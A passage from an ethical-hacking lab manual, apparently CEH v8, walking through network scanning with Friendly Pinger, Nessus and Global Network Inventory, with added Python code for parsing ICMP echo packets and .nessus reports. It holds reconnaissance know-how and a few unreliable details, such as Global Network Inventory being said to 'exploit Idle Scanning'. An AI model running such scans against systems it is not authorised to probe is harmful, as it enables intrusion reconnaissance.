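        raise ValueError("ICMP header is 8 bytes")
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    # a valid packet, summed including its own checksum field, complements to zero
    return {"type": icmp_type, "code": code, "checksum": csum, "identifier": ident,
            "sequence": seq, "payload": packet[8:],
            "checksum_ok": rfc1071_checksum(packet) == 0}


def is_reply_to(request: bytes, reply: bytes) -> bool:
    """Match a reply to its request the way ping does: id, sequence and payload agree."""
    rq, rp = parse_echo(request), parse_echo(reply)
    return (rq["type"] == ICMP_ECHO_REQUEST and rp["type"] == ICMP_ECHO_REPLY
            and rp["checksum_ok"] and rq["identifier"] == rp["identifier"]
            and rq["sequence"] == rp["sequence"] and rq["payload"] == rp["payload"])


if __name__ == "__main__":
    req = build_echo(0x1234, 1)
    rep = build_echo(0x1234, 1, icmp_type=ICMP_ECHO_REPLY)   # what the target would send back
    print(req.hex(), parse_echo(req))
    print("reply matches request:", is_reply_to(req, rep))
```

Because a reply is matched only on identifier, sequence and payload, a host that wants to stay invisible to ping simply drops type 8; conversely, the unauthenticated "Destination unreachable" and "Time exceeded" messages (types 3 and 11) are accepted by the sender with the same lack of verification, which is why the scenario lists them as a way to tear down connections.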


If you want to ping inside the network, behind the firewall, there will be no problems. If you want to ping other networks behind the firewall, it must be configured to let the ICMP packets pass through. Your network administrator should do it for you. The same applies to the proxy server.

FIGURE 9.8: FPinger Client area with Network architecture (Friendly Pinger [Default.map])

13. To scan the selected computer in the network, select the computer, select the Scan tab from the menu bar and click Scan.
Friendly Pinger [Default.map], Scan menu: Scan... (F6)

You may download the latest release from http://www.kilievich.com/fpinger

Select File | Options, and configure Friendly Pinger to your taste.

FIGURE 9.9: FPinger Scanning the computers in the Network

14. It displays the scanned details in the Scanning wizard.


Scanning results:
Service   Computer           Command
HTTP      WIN-MSSELCK4K41    http://WIN-MSSELCK4K41
HTTP      WIN-D39MR5HL9E4    http://WIN-D39MR5HL9E4
Scanning complete. (Rescan / Help / OK / Cancel)

Double-click the device to open it in Explorer.

FIGURE 9.10: FPinger Scanned results

15. Click the Inventory tab from the menu bar to view the configuration details of the selected computer.

Audit software and hardware components installed on the computers over the network.

Friendly Pinger [Default.map], Inventory menu: Inventory (Ctrl+F8), Inventory Options...

Tracking user access and files opened on your computer via the network.

FIGURE 9.11: FPinger Inventory tab

16. The General tab of the Inventory wizard shows the computer name and installed operating system.


Inventory - General tab (Computer/User):
Host name: WIN-D39MR5HL9E4
User name: Administrator
Windows Name: Windows Server 2012 Release Candidate Datacenter
Collection time: 8/22/2012 11:22:34 AM

Assignment of external commands (like telnet, tracert, net.exe) to devices.

FIGURE 9.12: FPinger Inventory wizard General tab

17. The Misc tab shows the network IP addresses, MAC addresses, file system, and size of the disks.

Search of HTTP, FTP, e-mail and other network services.
Inventory - Misc tab:
Network: IP address 10.0.0.7, MAC address D4-BE-D9-C3-CE-2D
Total space: 465.42 GB   Free space: 382.12 GB
Display settings: 1366x768, 60 Hz, True Color (32 bit)

Disk  Type   Free, GB  Size, GB  File System
C     Fixed  15.73     97.31     NTFS
D     Fixed  96.10     97.66     NTFS

The "Create Setup" function allows you to create a lite freeware version with your maps and settings.

FIGURE 9.13: FPinger Inventory wizard Misc tab

18. The Hardware tab shows the hardware component details of your networked computers.


Inventory - Hardware tab (WIN-D39MR5HL9E4):
Processor: 4x Intel Pentium III Xeon 3093
Memory: 4096 MB
BIOS: AT/AT COMPATIBLE DELL, 02/09/12
Monitors: Generic PnP Monitor
Display adapters: Intel(R) HD Graphics Family
Disk drives: ST3500413AS (Serial: W2A91RH6)
Network adapters: Realtek PCIe GBE Family Controller
SCSI and RAID controllers: Microsoft Storage Spaces Controller

FIGURE 9.14: FPinger Inventory wizard Hardware tab

19. The Software tab shows the installed software on the computers.

Inventory - Software tab (Name, Version, Developer, Homepage): Adobe Reader X (10.1.3), eMailTrackerPro, EPSON USB Display, Friendly Pinger, Intel(R) Processor Graphics, Java(TM) 6 Update 17, Microsoft .NET Framework 4 Multi-Targeting Pack, Microsoft Application Error Reporting, Microsoft Office Excel MUI (English) 2010, Microsoft Office OneNote MUI (English) 2010, Microsoft Office Outlook MUI (English) 2010, Microsoft Office PowerPoint MUI (English) 2010, Microsoft Office Proof (English) 2010, Microsoft Office Proof (French) 2010, Microsoft Office Proof (Spanish) 2010, ...

Visualization of your computer network as a beautiful animated screen.

FIGURE 9.15: FPinger Inventory wizard Software tab

Lab Analysis
Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.


Tool/Utility: Friendly Pinger
Information Collected/Objectives Achieved:
IP address range: 10.0.0.1 - 10.0.0.20
Found IP addresses:
■ 10.0.0.2
■ 10.0.0.3
■ 10.0.0.5
■ 10.0.0.7
Detailed result for 10.0.0.7:
■ Computer name
■ Operating system
■ IP address
■ MAC address
■ File system
■ Size of disk
■ Hardware information
■ Software information

Ask your instructor if you have questions related to this lab.

Questions
1. Does FPinger support proxy servers and firewalls?
2. Examine the programming language used in FPinger.

Internet Connection Required
[ ] Yes  [x] No

Platform Supported
[x] Classroom  [x] iLabs


Lab

Scanning a Network Using the Nessus Tool
Nessus allows you to remotely audit a network and determine if it has been broken into or misused in some way. It also provides the ability to locally audit a specific machine for vulnerabilities.

Lab Scenario
In the previous lab, you learned to use Friendly Pinger to monitor network devices, receive server notifications and ping information, track user access via the network, view graphical traceroutes, etc. Once attackers have the information related to network devices, they can use it as an entry point to a network for a comprehensive attack and perform many types of attacks ranging from DoS attacks to unauthorized administrative access. If attackers are able to get traceroute information, they might use a methodology such as firewalking to determine the services that are allowed through a firewall. If an attacker gains physical access to a switch or other network device, he or she will be able to install a rogue network device; therefore, as an administrator, you should disable unused ports in the configuration of the device. It is also very important that you use some methodology to detect such rogue devices on the network.

As an expert ethical hacker and penetration tester, you must understand how vulnerabilities, compliance specifications, and content policy violations are scanned using the Nessus tool.

Lab Objectives
This lab will give you experience in scanning the network for vulnerabilities, and show you how to use Nessus. It will teach you how to:
■ Use the Nessus tool
■ Scan the network for vulnerabilities


Lab Environment
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

To carry out the lab, you need:
■ Nessus, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\Nessus
■ You can also download the latest version of Nessus from http://www.tenable.com/products/nessus/nessus-download-agreement
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Administrative privileges to run the Nessus tool

Lab Duration
Time: 20 Minutes

Nessus was originally released under the GPL, but it has been proprietary software from Tenable since Nessus 3; the Nessus 5 build used in this lab requires registration for an activation code before plugins can be downloaded.

Overview of Nessus Tool
Nessus helps students to learn, understand, and determine vulnerabilities and weaknesses of a system and network in order to know how a system can be exploited. Network vulnerabilities can be network topology and OS vulnerabilities, open ports and running services, application and service configuration errors, and application and service vulnerabilities.

Lab Tasks

TASK 1: Nessus Installation
1. To install Nessus, navigate to D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\Nessus
2. Double-click the Nessus-5.0.1-x86_64.msi file.
3. The Open File - Security Warning window appears; confirm that the Publisher field shows Tenable Network Security, Inc. (an installer that Windows reports as unsigned or from another publisher should not be run) and click Run.

Open File - Security Warning dialog: Do you want to run this file? Name: the Nessus x86_64 .msi installer; Publisher: Tenable Network Security, Inc.; Type: Windows Installer Package; Run / Cancel; "Always ask before opening this file"; While files from the Internet can be useful, this file type can potentially harm your computer. Only run software from publishers you trust.

Nessus is designed to automate the testing and discovery of known security problems.

FIGURE 10.1: Open File - Security Warning


4. The Nessus - InstallShield Wizard appears. During the installation process, the wizard prompts you for some basic information. Follow the instructions and click Next.

The updated Nessus security checks database can be retrieved with the command nessus-update-plugins.

Tenable Nessus (x64) - InstallShield Wizard: Welcome to the InstallShield Wizard for Tenable Nessus (x64). The InstallShield(R) Wizard will install Tenable Nessus (x64) on your computer. To continue, click Next. WARNING: This program is protected by copyright law and international treaties.

FIGURE 10.2: The Nessus installation window

5. Before you begin installation, you must agree to the license agreement as shown in the following figure.
6. Select the radio button to accept the license agreement and click Next.

Nessus has the ability to test SSL-wrapped services such as https, smtps, imaps and more.

Nessus security scanner includes NASL (Nessus Attack Scripting Language).

Tenable Nessus (x64) - InstallShield Wizard, License Agreement: Tenable Network Security, Inc. NESSUS® Software License Agreement; "I accept the terms in the license agreement" / "I do not accept the terms in the license agreement"; Print / Back / Next / Cancel

FIGURE 10.3: The Nessus InstallShield Wizard

7. Select a destination folder and click Next.


Tenable Nessus (x64) - InstallShield Wizard, Destination Folder: Click Next to install to this folder, or click Change to install to a different folder. Install Tenable Nessus (x64) to: C:\Program Files\Tenable\Nessus\ (Change... / Back / Next / Cancel)

Nessus gives you the choice of performing a regular non-destructive security audit on a routine basis.

FIGURE 10.4: The Nessus InstallShield Wizard

8. The wizard prompts for Setup Type. With the Complete option, all program features will be installed. Check Complete and click Next.

Nessus probes a range of addresses on a network to determine which hosts are alive.

FIGURE 10.5: The Nessus InstallShield Wizard for Setup Type

9. The Nessus wizard will prompt you to confirm the installation. Click Install.


Tenable Nessus (x64) - InstallShield Wizard, Ready to Install the Program: The wizard is ready to begin installation. Click Install to begin the installation. If you want to review or change any of your installation settings, click Back. Click Cancel to exit the wizard.

Nessus probes network services on each host to obtain banners that contain software and OS version information.

FIGURE 10.6: Nessus InstallShield Wizard

10. Once installation is complete, click Finish.

Path of the Nessus home directory on Windows: \Program Files\Tenable\Nessus

Tenable Nessus (x64) - InstallShield Wizard Completed: The InstallShield Wizard has successfully installed Tenable Nessus (x64). Click Finish to exit the wizard.

FIGURE 10.7: Nessus InstallShield Wizard

Nessus Major Directories
The major directories of Nessus are shown in the following table.


Nessus Home Directory (Windows): \Program Files\Tenable\Nessus

Nessus Sub-Directories             Purpose
\conf                              Configuration files
\data                              Stylesheet templates
\nessus\plugins                    Nessus plugins
\nessus\users\<username>\kbs       User knowledgebase saved on disk
\nessus\logs                       Nessus log files

During the installation and daily operation of Nessus, manipulating the Nessus service is generally not required.

TABLE 10.1: Nessus Major Directories

11. After installation Nessus opens in your default browser.
12. The Welcome to Nessus screen appears; click the here link to connect via SSL.

Welcome to Nessus!
Please connect via SSL by clicking here. You are likely to get a security alert from your web browser saying that the SSL certificate is invalid. You may either choose to temporarily accept the risk, or can obtain a valid SSL certificate from a registrar. Please refer to the Nessus documentation for more information.

FIGURE 10.8: Nessus SSL certification

13. Click OK in the Security Alert pop-up, if it appears.

Security Alert: You are about to view pages over a secure connection. Any information you exchange with this site cannot be viewed by anyone else on the web. "In the future, do not show this warning"; OK / More Info

The Nessus Server Manager used in Nessus 4 has been deprecated.

FIGURE 10.9: Internet Explorer Security Alert

14. Click the Continue to this website (not recommended) link to continue.


Internet Explorer certificate error page: "There is a problem with this website's security certificate. The security certificate presented by this website was not issued by a trusted certificate authority. The security certificate presented by this website was issued for a different website's address. Security certificate problems may indicate an attempt to fool you or intercept any data you send to the server. We recommend that you close this webpage and do not continue to this website." Options: Click here to close this webpage / Continue to this website (not recommended) / More information.

FIGURE 10.10: Internet Explorer website's security certificate

15. Click OK in the Security Alert pop-up, if it appears.

Note: Due to the technical implementation of SSL certificates, it is not possible to ship a certificate with Nessus that would be trusted by browsers. To avoid the warning, a custom certificate specific to your organization must be used.

FIGURE 10.11: Internet Explorer Security Alert

16. The Thank you for installing Nessus screen appears. Click the Get Started > button. The screen summarizes what Nessus performs: high-speed vulnerability discovery (to determine which hosts are running which services), compliance checks (to verify and prove that every host on your network adheres to the security policy you define), scan scheduling (to automatically run scans at the frequency you choose), and more.

FIGURE 10.11: Nessus Getting Started

17. In Initial Account Setup, create the admin user for the scanner (login and password) and click Next >.


Initial Account Setup: "First, we need to create an admin user for the scanner. This user will have administrative control on the scanner; the admin has the ability to create/delete users, stop ongoing scans, and change the scanner configuration." Fields: Login (here admin), Password, Confirm Password.

Note: Because the admin user can change the scanner configuration, the admin has the ability to execute commands on the remote host. Therefore, it should be noted that the admin user has the same privileges as the "root" (or administrator) user on the remote host.

FIGURE 10.12: Nessus Initial Account Setup

18. In Plugin Feed Registration, you need to enter the activation code. To obtain an activation code, click the http://www.nessus.org/register/ link.

19. Click the Using Nessus at Home icon in Obtain an Activation Code.

Note: If you are using the Tenable SecurityCenter, the Activation Code and plugin updates are managed from SecurityCenter. Nessus needs to be started to be able to communicate with SecurityCenter, which it will normally not do without a valid Activation Code and plugins.

Obtain an Activation Code page (Tenable Network Security): Using Nessus at Work? / Using Nessus at Home? (the HomeFeed subscription is for home use only).

FIGURE 10.13: Nessus Obtaining Activation Code

20. In Nessus for Home, accept the agreement by clicking the Agree button as shown in the following figure.



FIGURE 10.14: Nessus Subscription Agreement

Note: If you do not register your copy of Nessus, you will not receive any new plugins and will be unable to start the Nessus server. The Activation Code is not case sensitive.

21. Fill in the Register a HomeFeed section to obtain an activation code and click Register.

Register a HomeFeed page: to stay up to date with the latest Nessus plugins, enter a valid email address to which an activation code will be sent (your email will not be shared with any third party); optionally check "Check to receive updates from Tenable", then click Register.

FIGURE 10.15: Nessus Registering HomeFeed

22. The Thank You for Registering window appears for Tenable Nessus HomeFeed.


Thank You for Registering! "Thank you for registering your Tenable Nessus HomeFeed. An email containing your activation code has just been sent to you at the email address you provided. Please note that the Tenable Nessus HomeFeed is available for home use only. If you want to use Nessus at your place of business, you must purchase the Nessus ProfessionalFeed. Alternately, you may purchase a subscription to the Nessus Perimeter Service and scan in the cloud. The Nessus Perimeter Service does not require any software download. For more information on the HomeFeed, ProfessionalFeed and Nessus Perimeter Service, please visit our Discussions Forum."

Note: After the initial registration, Nessus will download and compile the plugins obtained from port 443 of plugins.nessus.org or plugins-customers.nessus.org.

FIGURE 10.16: Nessus Registration Completed

23. Now log in to your email for the activation code provided at the time of registration, as shown in the following figure.


FIGURE 10.17: Nessus Registration mail

24. Now enter the activation code received at your email ID and click Next.


Plugin Feed Registration: "As information about new vulnerabilities is discovered and released into the public domain, Tenable's research staff designs programs ("plugins") that enable Nessus to detect their presence. The plugins contain vulnerability information, the algorithm to test for the presence of the security issue, and a set of remediation actions. To use Nessus, you need to subscribe to a "Plugin Feed". You can do so by visiting http://www.nessus.org/register/ to obtain an Activation Code."

■ To use Nessus at your workplace, purchase a commercial ProfessionalFeed
■ To use Nessus in a non-commercial home environment, you can get a HomeFeed for free
■ Tenable SecurityCenter users: enter 'SecurityCenter' in the field below
■ To perform offline plugin updates, enter 'offline' in the field below

Fields: Activation Code; Optional Proxy Settings.

Note: Once the plugins have been downloaded and compiled, the Nessus GUI will initialize and the Nessus server will start.

FIGURE 10.18: Nessus Applying Activation Code

25. The Registering window appears ("Registering... Registering the scanner with Tenable...") as shown in the following screenshot.

FIGURE 10.19: Nessus Registering Activation Code

26. After successful registration ("Successfully registered the scanner with Tenable. Successfully created the user."), click Next: Download plugins > to download Nessus plugins.

Note: Nessus server configuration is managed via the GUI. The nessusd.conf file is deprecated. In addition, proxy settings, subscription feed registration, and offline updates are managed via the GUI.

FIGURE 10.20: Nessus Downloading Plugins

27. Nessus will start fetching the plugins and install them ("Nessus is fetching the newest plugin set. Please wait..."). Installing the plugins and initializing takes some time.

FIGURE 10.21: Nessus fetching the newest plugin set

28. The Nessus Log In page appears. Enter the admin Username and Password you created in Initial Account Setup and click Log In.


TASK 2: Network Scan Vulnerabilities

Note: For the item SSH user name, enter the name of the account that is dedicated to Nessus on each of the scan target systems.

FIGURE 10.22: The Nessus Log In screen

29. The Nessus HomeFeed window appears. Click OK.


FIGURE 10.23: Nessus HomeFeed subscription

30. After you successfully log in, the Nessus Daemon window appears as shown in the following screenshot.

Note: To add a new policy, click Policies -> Add Policy.

FIGURE 10.24: The Nessus main screen

31. If you have an Administrator Role, you can see the Users tab, which lists all Users, their Roles, and their Last Logins.


Note: New policies are configured using the Credentials tab.

FIGURE 10.25: The Nessus administrator view

32. To add a new policy, click Policies -> Add Policy. Fill in the General policy sections, namely Basic, Scan, Network Congestion, Port Scanners, Port Scan Options, and Performance.

WARNING: Any changes to the Nessus scanner configuration will affect ALL Nessus users. Edit these options carefully.

FIGURE 10.26: Adding Policies

33. To configure the credentials of the new policy, click the Credentials tab shown in the left pane of Add Policy.


Note: The most effective credentialed scans are those for which the supplied credentials have root privileges.

FIGURE 10.27: Adding Policies and setting Credentials

34. To select the required plugins, click the Plugins tab in the left pane of Add Policy.

Note: If you are using Kerberos, you must configure the Nessus scanner to authenticate to a KDC.

FIGURE 10.28: Adding Policies and selecting Plugins

35. To configure preferences, click the Preferences tab in the left pane of Add Policy.

36. In the Plugin field, select Database settings from the drop-down list.

37. Enter the Login details given at the time of registration.

38. Give the Database SID: 4587, Database port to use: 124, and select Oracle auth type: SYSDBA.

39. Click Submit.

Note: If the policy is successfully added, the Nessus server displays a confirmation message (step 40).


FIGURE 10.29: Adding Policies and setting Preferences

40. A message Policy "Network Scan_Policy" was successfully added displays as shown as follows.

FIGURE 10.30: The NetworkScan Policy

Note: In the Add Scan window, input the fields Name, Type, Policy, Scan Targets, and Targets File.

41. Now, click Scans -> Add to open the Add Scan window.

42. Input the fields Name, Type, Policy, and Scan Targets.

43. In Scan Targets, enter the IP address of your network; here in this lab we are scanning 10.0.0.2.

44. Click Launch Scan at the bottom-right of the window.

Note: The IP addresses may differ in your lab environment.


Note: Nessus has the ability to save configured scan policies, network targets, and reports as a .nessus file.

FIGURE 10.31: Add Scan

45. The scan launches and starts scanning the network.

FIGURE 10.32: Scanning in progress

46. After the scan is complete, click the Reports tab.

FIGURE 10.33: Nessus Reports tab

47. Double-click Local Network to view the detailed scan report.

FIGURE 10.34: Report of the scanned target


48. Double-click any result to display a more detailed synopsis, description, security level, and solution.

Note: If you are manually creating "nessusrc" files, there are several parameters that can be configured to specify SSH authentications.

FIGURE 10.35: Report of a scanned target

49. Click the Download Report button in the left pane.

50. You can download available reports with a .nessus extension from the drop-down list (Download Report dialog: Download Format, Chapters ("Chapter Selection Not Allowed"), Submit / Cancel).

Note: To stop the Nessus server, go to the Nessus Server Manager and click the Stop Nessus Server button.

FIGURE 10.36: Download Report with .nessus extension

51. Now, click Log out.

52. In the Nessus Server Manager, click Stop Nessus Server.

FIGURE 10.37: Log out Nessus

■69■
Lab Analysis

Document all the results and reports gathered during the lab.
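The report downloaded in steps 49 and 50 is XML in the .nessus v2 layout (NessusClientData_v2 > Report > ReportHost > ReportItem), which makes it straightforward to turn into the per-host summary this analysis asks for instead of reading the web UI screen by screen. The following Python script is an added example for this lab and is not part of the manual or of Nessus itself: it parses a small .nessus document constructed here for illustration (the plugin IDs 900001-900004 and their names are made up, not real Nessus plugins), counts findings per host by severity, lists them worst-first, and extracts the live host/port pairs the scan observed. It assumes the element and attribute names of the v2 format (pluginID, pluginName, port, protocol, svc_name, severity, risk_factor, solution, and the host-ip / operating-system HostProperties tags).

```python
"""Summarize a Nessus v2 (.nessus) report: findings per host, sorted by severity."""
import xml.etree.ElementTree as ET
from collections import Counter

# Severity scale used by the ReportItem "severity" attribute in .nessus v2 files.
SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed sample report for this example (not real scan output, not real plugins).
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="Local Network">
    <ReportHost name="10.0.0.2">
      <HostProperties>
        <tag name="host-ip">10.0.0.2</tag>
        <tag name="operating-system">Windows Server 2008 (constructed)</tag>
      </HostProperties>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="2"
                  pluginID="900001" pluginName="Constructed: SMB signing not required">
        <risk_factor>Medium</risk_factor>
        <synopsis>Signing is not required on the remote SMB server.</synopsis>
        <solution>Enforce message signing in the host's configuration.</solution>
      </ReportItem>
      <ReportItem port="3389" svc_name="msrdp" protocol="tcp" severity="3"
                  pluginID="900002" pluginName="Constructed: RDP uses weak encryption">
        <risk_factor>High</risk_factor>
        <solution>Require TLS for RDP sessions.</solution>
      </ReportItem>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="900003" pluginName="Constructed: OS identification">
        <risk_factor>None</risk_factor>
      </ReportItem>
    </ReportHost>
    <ReportHost name="10.0.0.7">
      <HostProperties>
        <tag name="host-ip">10.0.0.7</tag>
      </HostProperties>
      <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="1"
                  pluginID="900004" pluginName="Constructed: SSH weak MAC algorithms">
        <risk_factor>Low</risk_factor>
        <solution>Disable MD5-based MACs in sshd_config.</solution>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """Return one dict per ReportItem: host, os, port, service, severity, plugin, solution."""
    root = ET.fromstring(xml_text)
    if root.tag != "NessusClientData_v2":
        raise ValueError("not a .nessus v2 document: root is %r" % root.tag)
    findings = []
    for host in root.iter("ReportHost"):
        # HostProperties tags carry per-host facts such as host-ip and operating-system.
        props = {t.get("name"): (t.text or "") for t in host.iter("tag")}
        for item in host.findall("ReportItem"):
            findings.append({
                "host": host.get("name"),
                "ip": props.get("host-ip", host.get("name")),
                "os": props.get("operating-system", "unknown"),
                "port": int(item.get("port", "0")),
                "protocol": item.get("protocol", ""),
                "service": item.get("svc_name", ""),
                "severity": int(item.get("severity", "0")),
                "risk_factor": item.findtext("risk_factor", default="None"),
                "plugin_id": item.get("pluginID"),
                "plugin_name": item.get("pluginName", ""),
                "solution": item.findtext("solution", default=""),
            })
    return findings


def summarize(findings, min_severity=1):
    """Count findings per host by severity name, dropping items below min_severity (Info by default)."""
    summary = {}
    for f in findings:
        if f["severity"] < min_severity:
            continue
        summary.setdefault(f["host"], Counter())[SEVERITY_NAMES[f["severity"]]] += 1
    return summary


def worst_first(findings):
    """Findings sorted highest severity first, then by host and port, for a report table."""
    return sorted(findings, key=lambda f: (-f["severity"], f["host"], f["port"]))


def open_ports(findings):
    """Distinct (host, port, protocol) triples observed: the live-services view of the scan."""
    return sorted({(f["host"], f["port"], f["protocol"]) for f in findings if f["port"] > 0})


if __name__ == "__main__":
    items = parse_nessus(SAMPLE_NESSUS)
    for host, counts in summarize(items).items():
        print(host, dict(counts))
    for f in worst_first(items):
        if f["severity"] > 0:
            print("%-10s %5d/%s %-7s %-8s %s" % (f["host"], f["port"], f["protocol"],
                                                 f["risk_factor"], f["service"], f["plugin_name"]))
```

Run it against a real export by replacing SAMPLE_NESSUS with the file's contents; the Info-level items (severity 0) are excluded from the summary deliberately because they describe the host rather than a weakness, but they stay in the parsed list so open_ports still reflects every service the scanner touched.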

Tool/Utility: Nessus

Information Collected/Objectives Achieved:
■ Scan Target Machine: Local Host
■ Performed Scan Policy: Network Scan Policy
■ Target IP Address: 10.0.0.2
■ Result: Local Host vulnerabilities

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Evaluate the OS platforms that Nessus has builds for. Evaluate whether Nessus works with the SecurityCenter.

2. Determine how the Nessus license works in a VM (Virtual Machine) environment.

Internet Connection Required: Yes
Platform Supported: Classroom, iLabs


Auditing Scanning by using Global Network Inventory

Global Network Inventory is used as an audit scanner in zero deployment and agent-free environments. It scans computers by IP range, by domain, as single computers, or as computers defined by the Global Network Inventory host file.
Lab Scenario

With the development of network technologies and applications, network attacks are greatly increasing both in number and severity. Attackers always look for service vulnerabilities and application vulnerabilities on network servers. If an attacker finds a flaw or loophole in a service run over the Internet, the attacker will immediately use it to compromise the entire system and any data found, and from there can compromise other systems on the network. Similarly, if the attacker finds a workstation with administrative privileges and faults in that workstation's applications, they can execute arbitrary code or implant viruses to intensify the damage to the network. As a key technique in the network security domain, intrusion detection systems (IDSes) play a vital role in detecting various kinds of attacks and securing networks. So, as an administrator you should make sure that services do not run as the root user, and should keep track of patches and updates for applications from vendors or security organizations such as CERT and CVE. Safeguards can be implemented so that email client software does not automatically open or execute attachments. In this lab, you will learn how networks are scanned using the Global Network Inventory tool.

Lab Objectives

This lab will show you how networks can be scanned and how to use Global Network Inventory. It will teach you how to:

■ Use the Global Network Inventory tool


Lab Environment

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

To carry out the lab, you need:

■ Global Network Inventory tool located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\Global Network Inventory Scanner
■ You can also download the latest version of Global Network Inventory from this link: http://www.magnetosoft.com/products/global_network_inventory/gni_features.htm
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as attacker (host machine)
■ Another computer running Windows Server 2008 as victim (virtual machine)
■ A web browser with Internet access
■ Follow the wizard-driven installation steps to install Global Network Inventory
■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Global Network Inventory

Global Network Inventory is one of the de facto tools for security auditing and testing of firewalls and networks; it is also used to exploit Idle Scanning.

Lab Tasks

TASK 1: Scanning the network

1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

FIGURE 11.1: Windows Server 2012 - Desktop view

2. Click the Global Network Inventory app to open the Global Network Inventory window.


Note: Scan computers by IP range, by domain, single computers, or computers defined by the Global Network Inventory host file.

FIGURE 11.2: Windows Server 2012 - Apps

3. The Global Network Inventory main window appears as shown in the following figure.

4. The Tip of the Day window also appears; click Close.

Note: Scan only items that you need by customizing scan elements.

FIGURE 11.3: Global Network Inventory Main Window

5. Turn on the Windows Server 2008 virtual machine from Hyper-V Manager.


Note: Reliable IP detection and identification of network appliances such as network printers, document centers, hubs, and other devices.

FIGURE 11.4: Windows 2008 Virtual Machine

6. Now switch back to the Windows Server 2012 machine; a New Audit Wizard window will appear. Click Next (or in the toolbar select the Scan tab and click Launch audit wizard).

New Audit Wizard: "Welcome to the New Audit Wizard. This wizard will guide you through the process of creating a new inventory audit. To continue, click Next."

Note: View scan results, including historic results for all scans, individual machines, or a selected number of addresses.

FIGURE 11.5: Global Network Inventory new audit wizard

7. Select IP range scan and then click Next in the Audit Scan Mode wizard.


New Audit Wizard, Audit Scan Mode: "To start a new audit scan you must choose the scenario that best fits how you will be using this scan."

■ Single address scan: choose this mode if you want to audit a single computer
■ IP range scan: choose this mode if you want to audit a group of computers within a single IP range
■ Domain scan: choose this mode if you want to audit computers that are part of the same domain(s)
■ Host file scan: choose this mode to audit computers specified in the host file; the most common scenario is to audit a group of computers without auditing an IP range or a domain
■ Export audit agent: choose this mode if you want to audit computers using a domain login script; an audit agent will be exported to a shared directory and can later be used in the domain login script

Note: Fully customizable layouts and color schemes on all views and reports.

FIGURE 11.6: Global Network Inventory Audit Scan Mode

Note: Export data to HTML, XML, Microsoft Excel, and text formats.

8. Set an IP range to scan and then click Next in the IP Range Scan wizard.

Note: Licenses are network-based rather than user-based. In addition, extra licenses to cover additional addresses can be purchased at any time if required.

9. In the Authentication Settings wizard, select Connect as, fill in the respective credentials of your Windows Server 2008 Virtual Machine, and click Next.


New Audit Wizard, Authentication Settings: "Specify the authentication settings to use to connect to a remote computer." Options: Connect as currently logged on user / Connect as (Domain\User name, Password).

Note: The program comes with dozens of customizable reports. New reports can be easily added through the user interface.

FIGURE 11.8: Global Network Inventory Authentication settings

10. Leave the settings as default and click Finish to complete the wizard.

New Audit Wizard, Completing the New Audit Wizard: "You are ready to start a new IP range scan. You can set the following options for this scan:" Do not record unavailable nodes (checked); Open scan progress dialog when scan starts (checked); Rescan nodes that have been successfully scanned; Rescan, but no more than once a day. "To complete this wizard, click Finish."

Note: Ability to generate reports on schedule after every scan, daily, weekly, or monthly.

Note: To configure reports choose Reports | Configure reports from the main menu and select a report from the tree control on the left. Each report can be configured independently.

FIGURE 11.9: Global Network Inventory final Audit wizard

11. It displays the Scanning progress in the Scan progress window.


Scan progress window: a grid of Address, Name, Percent and Timestamp for each node in the range (10.0.0.2 through 10.0.0.14 in this run, with the resolved host names shown where a node answered), the options Open this dialog when scan starts, Close this dialog when scan completes, and Don't display completed scans, and the status line Elapsed time: 0 min 6 sec, Scanned nodes: 0/24, with Stop and Close buttons.

Note: Filtering is a quick way to find a subset of data within a dataset. A filtered grid displays only the nodes that meet the criteria you specified for a column(s).

FIGURE 11.10: Global Network Inventory Scanning Progress 12. A f t e r c o m p l e t i o n , scanning results c a n b e v ie w e d a s s h o w n i n t h e f o llo w in g fig u re .

Global Network Inventory lets you change the grid layout simply by dragging column headers using the mouse. Dropping a header onto the Grouping pane groups data according to the values stored within the "grouped" column.

FIGURE 11.11: Global Network Inventory result window

13. Now select the Windows Server 2008 machine from the view results to view individual results.


The Global Network Inventory grid color scheme is completely customizable. You can change Global Network Inventory colors by selecting Tools | Grid colors from the main menu and changing the colors.

FIGURE 11.12: Global Network Inventory Individual machine results

14. The Scan Summary section gives you a brief summary of the machines that have been scanned.

To configure the results history level, choose Scan | Results history level from the main menu and set the desired history level.

FIGURE 11.13: Global Inventory Scan Summary tab

15. The Bios section gives details of the BIOS settings.


Scan only the items that you need by customizing the scan elements.

FIGURE 11.14: Global Network Inventory Bios summary tab

16. The Memory tab summarizes the memory in your scanned machine.

E-mail address: Specifies the email address that people should use when sending email to you at this account. The email address must be in the format name@company, for example, someone@mycompany.com.

FIGURE 11.15: Global Network Inventory Memory tab

17. In the NetBIOS section, complete details can be viewed.


Message subject: Type the subject of your message. Global Network Inventory cannot post a message that does not contain a subject.

FIGURE 11.16: Global Network Inventory NetBIOS tab

18. The User Groups tab shows user account details with the workgroup.

Name: Specifies the friendly name associated with your e-mail address. When you send messages, this name appears in the From box of your outgoing messages.

FIGURE 11.17: Global Network Inventory User groups section

19. The Logged on tab shows detailed logged-on information for the machine.


Port: Specifies the port number you connect to on your outgoing email (SMTP) server. This port number is usually 25.

FIGURE 11.18: Global Network Inventory Logged on Section

